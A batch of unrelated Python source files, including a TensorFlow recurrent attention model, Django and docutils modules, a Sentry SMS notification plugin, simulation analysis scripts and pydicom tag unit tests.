input_rnn_classification = g
output_rnn0, state_rnn0 = rnn_layers[0](input_rnn_classification,
state_rnn[0])
with tf.name_scope("classification_network"):
logits, endpoints["classification_network"] = self.classification_net(
output_rnn0)
# Second rnn layer (for glimpse locations).
with tf.variable_scope("dram_cell_1", reuse=reuse):
if stop_gradient_between_cells:
input_rnn_location = tf.stop_gradient(output_rnn0)
else:
input_rnn_location = output_rnn0
output_rnn1, state_rnn1 = rnn_layers[1](input_rnn_location, state_rnn[1])
with tf.name_scope("emission_network"):
locations, endpoints["emission_network"] = self.emission_net(
output_rnn1,
location_scale=location_scale,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev)
mean_locations = endpoints["emission_network"]["mean_locations"]
state_rnn = (state_rnn0, state_rnn1)
output_rnn = (output_rnn0, output_rnn1)
endpoints["cell_outputs"] = {
"locations": locations,
"state_rnn": state_rnn,
"output_rnn": output_rnn,
"mean_locations": mean_locations,
}
if not reuse:
self.collect_variables()
return logits, endpoints
class DRAMNetwork(object):
"""Deep Recurrent Attention Model.
Recurrent neural network that performs classification on images by taking
glimpses at different locations on an image.
Attributes:
glimpse_size: 2-D tuple of integers indicating glimpse size (height, width).
context_net: Context network object.
init_op: initialization operations for model variables.
dram_cell: DRAM model cell.
location_encoding: Use "absolute" or "relative" location.
var_list_location: List of variables for the location network.
var_list_classification: List of variables for the classification network.
var_list: List of all model variables.
glimpse_shape: Tuple of two integers with and size of glimpse.
num_resolutions: (Integer) Number of image resolutions used.
limit_classification_rf: (Boolean) Whether to limit classification to only
high resolution or all resolutions.
use_resolution_for_location: (List of Boolean of size num_resolutions)
Indicates which resolutions to use from high (small receptive field)
to low (wide receptive field) to set the initial state of the location
LSTM . None indicates use all resolutions.
Raises:
ValueError: if config.location_encoding is not 'absolute' or 'relative'.
"""
def __init__(self, config):
"""Init.
Args:
config: ConfigDict object with model parameters (see dram_config.py).
"""
self.dram_cell = DRAMCell(config)
if config.location_encoding in ["absolute", "relative"]:
self.location_encoding = config.location_encoding
else:
raise ValueError("location_encoding config can only be either "
"'absolute' or 'relative'")
self.glimpse_shape = self.dram_cell.glimpse_net.glimpse_shape
self.var_list = []
self.var_list_classification = []
self.var_list_location = []
self.init_op = None
self.num_resolutions = config.num_resolutions
self.limit_classification_rf = config.limit_classification_rf
# Use all resolutions to set the initial location LSTM state.
self.use_resolution_for_location = [
True for _ in range(self.num_resolutions)]
def collect_variables(self):
"""Collects model variables.
Populates variable lists with model variables and self.init_op with
variables' initializer. This function is only called once with __call__.
"""
self.var_list_classification += self.dram_cell.var_list_classification
self.var_list_location += self.dram_cell.var_list_location
self.var_list = (
self.var_list_classification + self.var_list_location)
self.init_op = tf.variables_initializer(var_list=self.var_list)
def __call__(self,
images,
num_times,
is_training=False,
policy="learned",
sampling_stddev=1e-5,
stop_gradient_between_cells=False,
stop_gradient_after_glimpse=False):
"""Builds DRAM network.
Args:
images: 4-D Tensor of shape [batch, height, width, channels].
num_times: Integer representing number of times for the RNNs.
is_training: (Boolean) To indicate training or inference modes.
policy: (String) 'learned': uses learned policy, 'random': uses random
policy, or 'center': uses center look policy.
sampling_stddev: Sampling distribution standard deviation.
stop_gradient_between_cells: (Boolean) Whether to stop the gradient
between the classification and location sub cells of the DRAM cell.
stop_gradient_after_glimpse: (Boolean) Whether to stop the gradient
after the glimpse net output.
Returns:
logits_t: Model logits at each time point.
locs_t: Glimpse locations at each time point.
"""
batch_size = images.shape.as_list()[0]
# Get context information for images.
endpoints = {}
# Ensure glimpses within image.
prev_locations = None
with tf.name_scope("pre_time"):
with tf.name_scope("initial_state"):
# Initial state zeros for rnn0 and contexts for rnn1
state_rnn0 = self.dram_cell.zero_states[0](batch_size, tf.float32)
state_rnn1 = self.dram_cell.zero_states[1](batch_size, tf.float32)
state_rnn = (state_rnn0, state_rnn1)
locations = tf.zeros(shape=(batch_size, 2))
with tf.name_scope("dram_cell"):
logits, endpoints_ = self.dram_cell(
images,
locations,
state_rnn,
use_resolution=self.use_resolution_for_location,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev,
stop_gradient_between_cells=stop_gradient_between_cells,
stop_gradient_after_glimpse=stop_gradient_after_glimpse
)
cell_outputs = endpoints_["cell_outputs"]
locations, mean_locations = (cell_outputs["locations"],
cell_outputs["mean_locations"])
endpoints["pre_time"] = endpoints_
endpoints["pre_time"]["logits"] = logits
# Set state of the classification network to 0, but keep location state.
state_rnn = (state_rnn0, cell_outputs["state_rnn"][1])
# Unrolling the model in time.
logits_t = []
locations_t = []
mean_locations_t = []
if self.limit_classification_rf:
# Use only the high resolution glimpse.
use_resolution_for_classification = [
True] + [False for _ in range(self.num_resolutions-1)]
else:
# Use glimpses from all resolutions.
use_resolution_for_classification = [
True for _ in range(self.num_resolutions)]
for t in range(num_times):
endpoints["time%d" % t] = {}
locations_t.append(locations)
mean_locations_t.append(mean_locations)
if self.location_encoding == "relative":
prev_locations = mean_locations
elif self.location_encoding == "absolute":
prev_locations = None
with tf.name_scope("time%d" % t):
with tf.name_scope("dram_cell"):
logits, endpoints_ = self.dram_cell(
images,
locations,
state_rnn,
use_resolution=use_resolution_for_classification,
prev_locations=prev_locations,
is_training=is_training,
policy=policy,
sampling_stddev=sampling_stddev,
stop_gradient_between_cells=stop_gradient_between_cells,
stop_gradient_after_glimpse=stop_gradient_after_glimpse
)
cell_outputs = endpoints_["cell_outputs"]
locations, state_rnn, _, mean_locations = (
cell_outputs["locations"], cell_outputs["state_rnn"],
cell_outputs["output_rnn"], cell_outputs["mean_locations"])
endpoints["time%d" % t].update(endpoints_)
logits_t.append(logits)
if t == 0:
self.collect_variables()
return (logits_t, locations_t, mean_locations_t, endpoints)
|
from rest_framework import serializers
#from orchestra.api.serializers import MultiSelectField
from orchestra.contrib.accounts.serializers import AccountSerializerMixin
from .models import Contact
class ContactSerializer(AccountSerializerMixin, serializers.HyperlinkedModelSerializer):
email_usage = serializers.MultipleChoiceField(choices=Contact.EMAIL_USAGES)
class Meta:
model = Contact
fields = (
'url', 'id', 'short_name', 'full_name', 'email', 'email_usage', 'phone',
'phone2', 'address', 'city', 'zipcode', 'country'
)
|
import unittest
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.client.api.entity_api import EntityApi
from exabel_data_sdk.tests.client.api.mock_entity_api import MockEntityApi
class TestEntityApi(unittest.TestCase):
def test_upsert(self):
entity_api: EntityApi = MockEntityApi()
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
)
created_entity = entity_api.upsert_entity(expected)
self.assertEqual(expected, created_entity)
updated_entity = entity_api.upsert_entity(expected)
self.assertEqual(expected, updated_entity)
def test_upsert_replaces_resource(self):
entity_api: EntityApi = MockEntityApi()
old_entity = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon's old display name",
description="Amazon's old description",
properties={"old_property": "old_value"},
)
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
description="Amazon's new description",
)
entity_api.create_entity(old_entity, old_entity.get_entity_type())
entity_api.upsert_entity(expected)
actual_entity = entity_api.get_entity(expected.name)
self.assertEqual(expected, actual_entity)
|
def main():
n = int(input())
a = 'I hate it'
b = 'I hate that'
c = 'I love it'
d = 'I love that'
for i in range(1,n):
if i % 2 == 1:
print(b,end=" ")
else:
print(d,end=" ")
if n % 2 == 1:
print(a,end=" ")
if n % 2 == 0:
print(c,end=" ")
if __name__ == "__main__":
main() |
from request import Request
class Streams(object):
def get_activity_streams():
return
def get_route_streams():
return
def get_segment_effort_streams():
return
def get_segment_streams():
return |
import unyt as u
import numpy as np
import pandas as pd
from mosdef_cassandra.analysis import ThermoProps
def main():
# Systems simulated
pore_area = 2 * 22.104 * 21.270 * u.angstrom**2 # From .inp file
pore_sizes = [1.0, 1.5, 2.0] * u.nm
n_ion_pairs = [0, 4, 8]
# Output
nmols_list = []
pore_sizes_list = []
n_ion_pair_list = []
for pore_size in pore_sizes:
for n_ion_pair in n_ion_pairs:
thermo_path = f"../gcmc/{pore_size.to_value('nm')}nm_{n_ion_pair}pairs/gcmc.out.prp"
thermo = ThermoProps(thermo_path)
nmols_list.append(thermo.prop("Nmols_4", start=20000000).mean())
pore_sizes_list.append(pore_size)
n_ion_pair_list.append(n_ion_pair)
df = pd.DataFrame(
columns=["pore_size_nm", "n_ion_pairs", "nmols", "nmols_per_nm^2"]
)
df["pore_size_nm"] = np.array(pore_sizes_list)
df["n_ion_pairs"] = np.array(n_ion_pair_list)
df["nmols"] = np.array(nmols_list)
df["nmols_per_nm^2"] = np.array(nmols_list) / pore_area.to_value(u.nm**2)
df.to_csv("results.csv")
if __name__ == "__main__":
main()
|
from os import path
from django.utils.translation import gettext_lazy as _
from docutils import nodes
from docutils.transforms import Transform
from docutils.utils import relative_path
from django_docutils.lib.transforms.font_awesome import fa_classes_from_url
from django_docutils.references.models import get_reference_model
from ..nodes import pending_xref
Reference = get_reference_model()
class XRefTransform(Transform):
default_priority = 5
def apply(self):
references = Reference.objects.all().values()
for node in self.document.traverse(pending_xref):
contnode = node[0].deepcopy()
domain = 'std'
project, target = node['reftarget'].split(':', 1)
ref = next(
(
r
for r in references
if r['target'] == target and r['project'] == project
),
None,
)
if not ref:
ref = next((r for r in references if r['target'] == target), None)
proj, version, uri, dispname = (
ref['project'],
ref['project_version'],
ref['uri'],
ref['display_name'],
)
if not dispname:
dispname = '-'
if '://' not in uri and node.get('refdoc'):
# get correct path in case of subdirectories
uri = path.join(relative_path(node['refdoc'], '.'), uri)
newnode = nodes.reference(
'',
'',
internal=False,
refuri=uri,
reftitle=_('(in %s v%s)') % (proj, version),
)
if node.get('refexplicit'):
# use whatever title was given
newnode.append(contnode)
elif dispname == '-' or (domain == 'std' and node['reftype'] == 'keyword'):
# use whatever title was given, but strip prefix
title = contnode.astext()
if project and title.startswith(project + ':'):
newnode.append(
contnode.__class__(
title[len(project) + 1 :], title[len(project) + 1 :]
)
)
else:
newnode.append(contnode)
else:
# else use the given display name (used for :ref:)
newnode.append(contnode.__class__(dispname, dispname))
fa_classes = fa_classes_from_url(url=uri)
if fa_classes != '':
fa_tag = f'<em class="{fa_classes}"></em>'
newnode.insert(0, nodes.raw('', fa_tag, format='html'))
node.replace_self(newnode)
def visit_pending_xref(self, node):
pass
def depart_pending_xref(self, node):
pass
|
"""
sentry_46elks.models
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2012 by Matt Robenolt.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import re
import requests
import sentry_46elks
from django import forms
from django.utils.translation import ugettext_lazy as _
from sentry.conf import settings
from sentry.plugins.bases.notify import NotificationPlugin
NOTSET = object()
class Sentry46ElksConfigurationForm(forms.Form):
api_endpoint = forms.CharField(
label=_('API Endpoint'),
required=True,
help_text=_('API URL used for sending the texts'),
initial='https://api.46elks.com/a1/SMS',
)
api_username = forms.CharField(
label=_('API username'),
required=True,
widget=forms.TextInput(attrs={'class': 'span6'}),
)
api_password = forms.CharField(
label=_('API password'),
required=True,
widget=forms.PasswordInput(
render_value=True,
attrs={'class': 'span6'},
),
)
sender = forms.CharField(
label=_('SMS Sender'),
required=True,
help_text=_('The number/name of the sender'),
widget=forms.TextInput(attrs={'placeholder': 'e.g. +46701234567'}),
)
receivers = forms.CharField(
label=_('SMS Receivers'),
required=True,
help_text=_('Recipient(s) phone numbers separated by commas '
'or line breaks'),
widget=forms.Textarea(
attrs={'placeholder': 'e.g. +46701234567, +46709876543'}
),
)
def clean_receivers(self):
data = self.cleaned_data['receivers']
phones = set(filter(bool, re.split(r'\s*,\s*|\s+', data)))
msg_tmpl = '{0} is not a valid phone number.'
for phone in phones:
if not re.match(r'^\+\d{10,}$', phone):
raise forms.ValidationError(msg_tmpl.format(phone))
return ','.join(phones)
def clean(self):
# TODO: Ping 46elks and check credentials (?)
return self.cleaned_data
class Sentry46ElksPlugin(NotificationPlugin):
author = 'Jacob Magnusson'
author_url = 'https://github.com/jmagnusson'
version = sentry_46elks.__version__
description = 'A plugin for Sentry which sends SMS notifications via ' \
'46elks SMS API'
resource_links = (
('Documentation',
'https://github.com/jmagnusson/sentry-46elks/blob/master/README.md'),
('Bug Tracker',
'https://github.com/jmagnusson/sentry-46elks/issues'),
('Source',
'https://github.com/jmagnusson/sentry-46elks'),
('46elks',
'http://www.46elks.com/'),
)
slug = '46elks'
title = _('46elks (SMS)')
conf_title = title
conf_key = '46elks'
project_conf_form = Sentry46ElksConfigurationForm
def __init__(self, min_level=NOTSET, *args, **kwargs):
super(Sentry46ElksPlugin, self).__init__(*args, **kwargs)
if min_level is NOTSET:
min_level = getattr(settings, 'SMS_LEVEL')
self.min_level = min_level
def is_configured(self, request, project, **kwargs):
fields = ('api_baseurl', 'api_username', 'api_password', 'sender',
'receivers')
return all([self.get_option(o, project) for o in fields])
def get_send_to(self, *args, **kwargs):
# This doesn't depend on email permission... stuff.
return True
def notify_users(self, group, event):
project = group.project
error_level = event.get_level_display()
error = event.error().splitlines()
error = error[0] if len(error) else ''
body = 'Sentry [{0}] {1}: {2}'.format(project.name, error_level, error)
body = body[:160] # Truncate to 160 characters
endpoint = self.get_option('api_endpoint', project)
auth = (self.get_option('api_username', project),
self.get_option('api_password', project))
sender = self.get_option('sender', project)
receivers = self.get_option('receivers', project).split(',')
for receiver in receivers:
try:
requests.post(endpoint, auth=auth, data={
'from': sender,
'to': receiver,
'message': body,
})
except Exception as e:
# TODO: Handle
raise e
def get_option(self, key, *args, **kwargs):
super_ = super(Sentry46ElksPlugin, self)
value = super_.get_option(key, *args, **kwargs)
if value is None and key in ('min_level', ):
value = getattr(self, key)
return value
|
from nanome._internal._util._serializers import _TypeSerializer
from nanome._internal._shapes._mesh import _Mesh
class _MeshSerializer(_TypeSerializer):
def __init__(self):
pass
def version(self):
return 0
def name(self):
return "MeshShape"
def serialize(self, version, value, context):
context.write_float_array(value.vertices)
context.write_float_array(value.normals)
context.write_float_array(value.colors)
context.write_int_array(value.triangles)
context.write_float_array(value.uv)
def deserialize(self, version, context):
result = _Mesh._create()
result.vertices = context.read_float_array()
result.normals = context.read_float_array()
result.colors = context.read_float_array()
result.triangles = context.read_int_array()
result.uv = context.read_float_array()
return result
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Unit tests for the pydicom.tag module."""
import pytest
from pydicom.tag import BaseTag, Tag, TupleTag, tag_in_exception
class TestBaseTag:
"""Test the BaseTag class."""
def test_le_same_class(self):
"""Test __le__ of two classes with same type."""
assert BaseTag(0x00000000) <= BaseTag(0x00000001)
assert BaseTag(0x00000001) <= BaseTag(0x00000001)
assert not BaseTag(0x00000001) <= BaseTag(0x00000000)
def test_le_diff_class(self):
"""Test __le__ of two classes with different type."""
assert BaseTag(0x00000000) <= 1
assert BaseTag(0x00000001) <= 1
assert not BaseTag(0x00000001) <= 0
def test_le_subclass(self):
"""Test __le__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) <= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) <= BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) <= BaseTag(0x00000000)
def test_le_tuple(self):
"""Test __le__ of tuple with BaseTag."""
assert BaseTag(0x00010001) <= (0x0001, 0x0002)
assert BaseTag(0x00010002) <= (0x0001, 0x0002)
assert not BaseTag(0x00010002) <= (0x0001, 0x0001)
def test_le_raises(self):
"""Test __le__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) <= 'Somethin'
pytest.raises(TypeError, test_raise)
def test_lt_same_class(self):
"""Test __lt__ of two classes with same type."""
assert BaseTag(0x00000000) < BaseTag(0x00000001)
assert not BaseTag(0x00000001) < BaseTag(0x00000001)
assert not BaseTag(0x00000001) < BaseTag(0x00000000)
def test_lt_diff_class(self):
"""Test __lt__ of two classes with different type."""
assert BaseTag(0x00000000) < 1
assert not BaseTag(0x00000001) < 1
assert not BaseTag(0x00000001) < 0
def test_lt_subclass(self):
"""Test __lt__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) < BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) < BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) < BaseTag(0x00000000)
def test_lt_tuple(self):
"""Test __lt__ of tuple with BaseTag."""
assert BaseTag(0x00010001) < (0x0001, 0x0002)
assert not BaseTag(0x00010002) < (0x0001, 0x0002)
assert not BaseTag(0x00010002) < (0x0001, 0x0001)
def test_lt_raises(self):
"""Test __lt__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) < 'Somethin'
pytest.raises(TypeError, test_raise)
def test_ge_same_class(self):
"""Test __ge__ of two classes with same type."""
assert not BaseTag(0x00000000) >= BaseTag(0x00000001)
assert BaseTag(0x00000001) >= BaseTag(0x00000001)
assert BaseTag(0x00000001) >= BaseTag(0x00000000)
def test_ge_diff_class(self):
"""Test __ge__ of two classes with different type."""
assert not BaseTag(0x00000000) >= 1
assert BaseTag(0x00000001) >= 1
assert BaseTag(0x00000001) >= 0
def test_ge_subclass(self):
"""Test __ge__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) >= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) >= BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) >= BaseTag(0x00000000)
def test_ge_tuple(self):
"""Test __ge__ of tuple with BaseTag."""
assert not BaseTag(0x00010001) >= (0x0001, 0x0002)
assert BaseTag(0x00010002) >= (0x0001, 0x0002)
assert BaseTag(0x00010002) >= (0x0001, 0x0001)
def test_ge_raises(self):
"""Test __ge__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) >= 'AGHIJJJJ'
pytest.raises(TypeError, test_raise)
def test_gt_same_class(self):
"""Test __gt__ of two classes with same type."""
assert not BaseTag(0x00000000) > BaseTag(0x00000001)
assert not BaseTag(0x00000001) > BaseTag(0x00000001)
assert BaseTag(0x00000001) > BaseTag(0x00000000)
def test_gt_diff_class(self):
"""Test __gt__ of two classes with different type."""
assert not BaseTag(0x00000000) > 1
assert not BaseTag(0x00000001) > 1
assert BaseTag(0x00000001) > 0
def test_gt_subclass(self):
"""Test __gt__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) > BaseTag(0x00000001)
assert not BaseTagPlus(0x00000001) > BaseTag(0x00000001)
assert BaseTagPlus(0x00000001) > BaseTag(0x00000000)
def test_gt_tuple(self):
"""Test __gt__ of tuple with BaseTag."""
assert not BaseTag(0x00010001) > (0x0001, 0x0002)
assert not BaseTag(0x00010002) > (0x0001, 0x0002)
assert BaseTag(0x00010002) > (0x0001, 0x0001)
def test_gt_raises(self):
"""Test __gt__ raises TypeError when comparing to non numeric."""
def test_raise():
BaseTag(0x00010002) > 'BLUH'
pytest.raises(TypeError, test_raise)
def test_eq_same_class(self):
"""Test __eq__ of two classes with same type."""
assert BaseTag(0x00000000) == BaseTag(0x00000000)
assert not BaseTag(0x00000001) == BaseTag(0x00000000)
def test_eq_diff_class(self):
"""Test __eq__ of two classes with different type."""
# Make sure to test BaseTag.__eq__() not int.__eq__()
assert BaseTag(0x00000000) == 0
assert not BaseTag(0x00000001) == 0
def test_eq_subclass(self):
"""Test __eq__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert BaseTagPlus(0x00000000) == BaseTag(0x00000000)
assert not BaseTagPlus(0x00000001) == BaseTag(0x00000000)
def test_eq_tuple(self):
"""Test __eq__ of tuple with BaseTag."""
# Make sure to test BaseTag.__eq__() not tuple.__eq__()
assert BaseTag(0x00010002) == (0x0001, 0x0002)
assert not BaseTag(0x00010001) == (0x0001, 0x0002)
def test_eq_non_numeric(self):
"""Test __eq__ of non numeric with BaseTag."""
assert not BaseTag(0x00010002) == 'eraa'
def test_ne_same_class(self):
"""Test __ne__ of two classes with same type."""
assert not BaseTag(0x00000000) != BaseTag(0x00000000)
assert BaseTag(0x00000001) != BaseTag(0x00000000)
def test_ne_diff_class(self):
"""Test __ne__ of two classes with different type."""
# Make sure to test BaseTag.__ne__() not int.__ne__()
assert not BaseTag(0x00000000) != 0
assert BaseTag(0x00000001) != 0
def test_ne_subclass(self):
"""Test __ne__ of two classes with one as a subclass."""
class BaseTagPlus(BaseTag):
pass
assert not BaseTagPlus(0x00000000) != BaseTag(0x00000000)
assert BaseTagPlus(0x00000001) != BaseTag(0x00000000)
def test_ne_tuple(self):
"""Test __ne__ of tuple with BaseTag."""
# Make sure to test BaseTag.__ne__() not tuple.__ne__()
assert not BaseTag(0x00010002) != (0x0001, 0x0002)
assert BaseTag(0x00010001) != (0x0001, 0x0002)
def test_ne_non_numeric(self):
"""Test __ne__ of non numeric with BaseTag."""
assert BaseTag(0x00010002) != 'aaag'
def test_hash(self):
"""Test hash of BaseTag class."""
assert hash(BaseTag(0x00010001)) == hash(BaseTag(0x00010001))
assert hash(BaseTag(0x00010001)) != hash(BaseTag(0x00010002))
assert hash(BaseTag(0x00020001)) != hash(BaseTag(0x00010002))
def test_str(self):
"""Test str(BaseTag) produces correct value."""
assert '(0000, 0000)' == str(BaseTag(0x00000000))
assert '(0001, 0002)' == str(BaseTag(0x00010002))
assert '(1000, 2000)' == str(BaseTag(0x10002000))
assert '(ffff, fffe)' == str(BaseTag(0xFFFFFFFE))
def test_group(self):
"""Test BaseTag.group returns correct values."""
assert 0x0000 == BaseTag(0x00000001).group
assert 0x0002 == BaseTag(0x00020001).group
assert 0xFFFF == BaseTag(0xFFFF0001).group
def test_element(self):
"""Test BaseTag.element returns correct values."""
assert 0x0000 == BaseTag(0x00010000).element
assert 0x0002 == BaseTag(0x00010002).element
assert 0xFFFF == BaseTag(0x0001FFFF).element
def test_private(self):
"""Test BaseTag.is_private returns correct values."""
# Odd groups private
assert BaseTag(0x00010001).is_private
# Even groups not private
assert not BaseTag(0x00020001).is_private
# Group 0 not private
assert not BaseTag(0x00000001).is_private
def test_private_creator(self):
"""Test BaseTag.is_private_creator returns correct values."""
# Non-private tag
assert not BaseTag(0x00080010).is_private_creator
# private creator have element 0x0010 - 0x00FF
assert not BaseTag(0x0009000F).is_private_creator
assert BaseTag(0x00090010).is_private_creator
assert BaseTag(0x000900FF).is_private_creator
assert not BaseTag(0x00090100).is_private_creator
class TestTag:
"""Test the Tag method."""
def test_tag_single_int(self):
"""Test creating a Tag from a single int."""
assert Tag(0x0000) == BaseTag(0x00000000)
assert Tag(10) == BaseTag(0x0000000A)
assert Tag(0xFFFF) == BaseTag(0x0000FFFF)
assert Tag(0x00010002) == BaseTag(0x00010002)
# Must be 32-bit
pytest.raises(OverflowError, Tag, 0xFFFFFFFF1)
# Must be positive
pytest.raises(ValueError, Tag, -1)
def test_tag_single_tuple(self):
"""Test creating a Tag from a single tuple."""
assert Tag((0x0000, 0x0000)) == BaseTag(0x00000000)
assert Tag((0x22, 0xFF)) == BaseTag(0x002200FF)
assert Tag((14, 0xF)) == BaseTag(0x000E000F)
assert Tag((0x1000, 0x2000)) == BaseTag(0x10002000)
assert Tag(('0x01', '0x02')) == BaseTag(0x00010002)
# Must be 2 tuple
pytest.raises(ValueError, Tag, (0x1000, 0x2000, 0x0030))
pytest.raises(ValueError, Tag, ('0x10', '0x20', '0x03'))
# Must be 32-bit
pytest.raises(OverflowError, Tag, (0xFFFF, 0xFFFF1))
pytest.raises(OverflowError, Tag, ('0xFFFF', '0xFFFF1'))
# Must be positive
pytest.raises(ValueError, Tag, (-1, 0))
pytest.raises(ValueError, Tag, (0, -1))
pytest.raises(ValueError, Tag, ('0x0', '-0x1'))
pytest.raises(ValueError, Tag, ('-0x1', '0x0'))
# Can't have second parameter
msg = r"Unable to create an element tag from '\(\(1, 2\), 1\)'"
with pytest.raises(TypeError, match=msg):
Tag((0x01, 0x02), 0x01)
pytest.raises(TypeError, Tag, (0x01, 0x02), '0x01')
pytest.raises(TypeError, Tag, ('0x01', '0x02'), '0x01')
pytest.raises(TypeError, Tag, ('0x01', '0x02'), 0x01)
def test_tag_single_list(self):
"""Test creating a Tag from a single list."""
assert Tag([0x0000, 0x0000]) == BaseTag(0x00000000)
assert Tag([0x99, 0xFE]) == BaseTag(0x009900FE)
assert Tag([15, 0xE]) == BaseTag(0x000F000E)
assert Tag([0x1000, 0x2000]) == BaseTag(0x10002000)
assert Tag(['0x01', '0x02']) == BaseTag(0x00010002)
# Must be 2 list
pytest.raises(ValueError, Tag, [0x1000, 0x2000, 0x0030])
pytest.raises(ValueError, Tag, ['0x10', '0x20', '0x03'])
pytest.raises(ValueError, Tag, [0x1000])
pytest.raises(ValueError, Tag, ['0x10'])
# Must be int or string
msg = (
r"Unable to create an element tag from '\[1.0, 2.0\]': both "
r"arguments must be the same type and str or int"
)
with pytest.raises(TypeError, match=msg):
Tag([1., 2.])
# Must be 32-bit
pytest.raises(OverflowError, Tag, [65536, 0])
pytest.raises(OverflowError, Tag, [0, 65536])
pytest.raises(OverflowError, Tag, ('0xFFFF', '0xFFFF1'))
# Must be positive
pytest.raises(ValueError, Tag, [-1, 0])
pytest.raises(ValueError, Tag, [0, -1])
pytest.raises(ValueError, Tag, ('0x0', '-0x1'))
pytest.raises(ValueError, Tag, ('-0x1', '0x0'))
# Can't have second parameter
msg = r"Unable to create an element tag from '\(\[1, 2\], 1\)'"
with pytest.raises(TypeError, match=msg):
Tag([0x01, 0x02], 0x01)
pytest.raises(TypeError, Tag, [0x01, 0x02], '0x01')
pytest.raises(TypeError, Tag, ['0x01', '0x02'], '0x01')
pytest.raises(TypeError, Tag, ['0x01', '0x02'], 0x01)
def test_tag_single_str(self):
"""Test creating a Tag from a single str."""
assert Tag('0x10002000') == BaseTag(0x10002000)
assert Tag('0x2000') == BaseTag(0x00002000)
assert Tag('15') == BaseTag(0x00000015)
assert Tag('0xF') == BaseTag(0x0000000F)
assert Tag("PatientName") == BaseTag(0x00100010)
# Must be 32-bit
pytest.raises(OverflowError, Tag, '0xFFFFFFFF1')
# Must be positive
pytest.raises(ValueError, Tag, '-0x01')
# Must be numeric str or DICOM keyword
pytest.raises(ValueError, Tag, 'hello')
def test_tag_double_str(self):
"""Test creating a Tag from two str."""
assert Tag('0x1000', '0x2000') == BaseTag(0x10002000)
assert Tag('0x10', '0x20') == BaseTag(0x00100020)
assert Tag('15', '0') == BaseTag(0x00150000)
assert Tag('0xF', '0') == BaseTag(0x000F0000)
# Must be 32-bit
pytest.raises(OverflowError, Tag, '0xFFFF1', '0')
pytest.raises(OverflowError, Tag, '0', '0xFFFF1')
# Must be positive
pytest.raises(ValueError, Tag, '-0x01', '0')
pytest.raises(ValueError, Tag, '0', '-0x01')
pytest.raises(ValueError, Tag, '-1', '-0x01')
# Must both be str
pytest.raises(TypeError, Tag, '0x01', 0)
pytest.raises(TypeError, Tag, 0, '0x01')
def test_tag_double_int(self):
"""Test creating a Tag from a two ints."""
assert Tag(0x0000, 0x0000) == BaseTag(0x00000000)
assert Tag(2, 0) == BaseTag(0x00020000)
assert Tag(2, 0).elem == 0x0000
assert Tag(0x99, 0xFE) == BaseTag(0x009900FE)
assert Tag(15, 14) == BaseTag(0x000F000E)
assert Tag(0x1000, 0x2000) == BaseTag(0x10002000)
# Must be 32-bit
pytest.raises(OverflowError, Tag, 65536, 0)
pytest.raises(OverflowError, Tag, 0, 65536)
# Must be positive
pytest.raises(ValueError, Tag, -1, 0)
pytest.raises(ValueError, Tag, 0, -1)
pytest.raises(ValueError, Tag, -65535, -1)
class TestTupleTag:
"""Test the TupleTag method."""
def test_tuple_tag(self):
"""Test quick tag construction with TupleTag."""
assert TupleTag((0xFFFF, 0xFFee)) == BaseTag(0xFFFFFFEE)
class TestTagInException:
"""Test the tag_in_exception method."""
def test_raise_exception(self):
""""""
def test():
tag = Tag(0x00100010)
with tag_in_exception(tag) as tag:
raise ValueError('Test message.')
pytest.raises(ValueError, test)
|
# coding: utf-8
# $Id: __init__.py 8295 2019-07-24 09:22:01Z grubert $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Miscellaneous utilities for the documentation utilities.
"""
__docformat__ = 'reStructuredText'
import sys
import os
import os.path
import re
import itertools
import warnings
import unicodedata
from docutils import ApplicationError, DataError, __version_info__
from docutils import nodes
from docutils.nodes import unescape
import docutils.io
from docutils.utils.error_reporting import ErrorOutput, SafeString
class SystemMessage(ApplicationError):
def __init__(self, system_message, level):
Exception.__init__(self, system_message.astext())
self.level = level
class SystemMessagePropagation(ApplicationError): pass
class Reporter:
"""
Info/warning/error reporter and ``system_message`` element generator.
Five levels of system messages are defined, along with corresponding
methods: `debug()`, `info()`, `warning()`, `error()`, and `severe()`.
There is typically one Reporter object per process. A Reporter object is
instantiated with thresholds for reporting (generating warnings) and
halting processing (raising exceptions), a switch to turn debug output on
or off, and an I/O stream for warnings. These are stored as instance
attributes.
When a system message is generated, its level is compared to the stored
thresholds, and a warning or error is generated as appropriate. Debug
messages are produced if the stored debug switch is on, independently of
other thresholds. Message output is sent to the stored warning stream if
not set to ''.
The Reporter class also employs a modified form of the "Observer" pattern
[GoF95]_ to track system messages generated. The `attach_observer` method
should be called before parsing, with a bound method or function which
accepts system messages. The observer can be removed with
`detach_observer`, and another added in its place.
.. [GoF95] Gamma, Helm, Johnson, Vlissides. *Design Patterns: Elements of
Reusable Object-Oriented Software*. Addison-Wesley, Reading, MA, USA,
1995.
"""
levels = 'DEBUG INFO WARNING ERROR SEVERE'.split()
"""List of names for system message levels, indexed by level."""
# system message level constants:
(DEBUG_LEVEL,
INFO_LEVEL,
WARNING_LEVEL,
ERROR_LEVEL,
